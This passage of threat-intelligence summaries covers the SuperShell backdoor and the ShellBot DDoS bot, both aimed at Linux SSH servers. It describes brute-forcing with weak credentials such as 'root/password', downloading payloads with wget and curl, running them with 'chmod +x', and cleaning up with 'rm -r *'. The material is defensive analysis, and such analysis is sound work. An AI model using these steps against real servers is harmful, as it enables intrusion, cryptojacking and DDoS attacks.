- SuperShell is a sophisticated backdoor malware targeting Linux SSH servers, written in the Go language, which allows cross-platform functionality on Linux, Windows, and Android. Created by a Chinese-speaking developer, it operates as a reverse shell, enabling attackers to execute commands remotely on the compromised systems. The attack begins with brute force and dictionary attacks against SSH servers, using weak credentials like "root/password" and "root/123456qwerty." Once access is gained, attackers execute a series of commands to download and install SuperShell, leveraging tools like wget, curl, tftp, and FTP, with download sources often hosted on compromised servers.
- SuperShell's obfuscation adds complexity, but it can still be identified through specific internal strings and its runtime behavior. The malware's installation process is versatile, targeting directories like /tmp, /var/run, /mnt, and /root, with commands often including clean-up actions to remove traces post-installation (rm -r *). Typically, the payload involves downloading a script or binary, which is then executed with elevated permissions using chmod +x followed by execution (./ssh1). This pattern is consistently observed across multiple commands, highlighting the malware's redundancy and persistence in ensuring successful deployment.
- Additionally, the attackers often deploy XMRig, a Monero cryptocurrency miner, alongside SuperShell, hinting at a dual-purpose attack: maintaining persistent control over the system while generating illicit cryptocurrency.
2023-03-13 Ahnlab: ShellBot Malware Being Distributed to Linux SSH Servers
- On March 13, 2023, ASEC reported that ShellBot, a Perl-based DDoS bot, is actively targeting Linux SSH servers. The malware exploits weak SSH credentials through brute-force attacks, gaining access to deploy its payload. Once installed, ShellBot connects to a Command and Control (C&C) server via the IRC protocol, enabling attackers to issue commands, steal data, and launch DDoS attacks.
- Initial Access: Attackers scan for servers with open SSH ports (port 22) and use brute-force tools to guess weak or default credentials.
- Installation: After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.
- IRC Protocol: ShellBot uses the IRC protocol for C&C communication, allowing it to receive commands like executing remote tasks or launching DDoS attacks without needing a custom C&C infrastructure.
- Customization: ShellBot is highly customizable, with variants like "LiGhT’s Modded perlbot v2" offering different capabilities and attack methods tailored by various threat actors.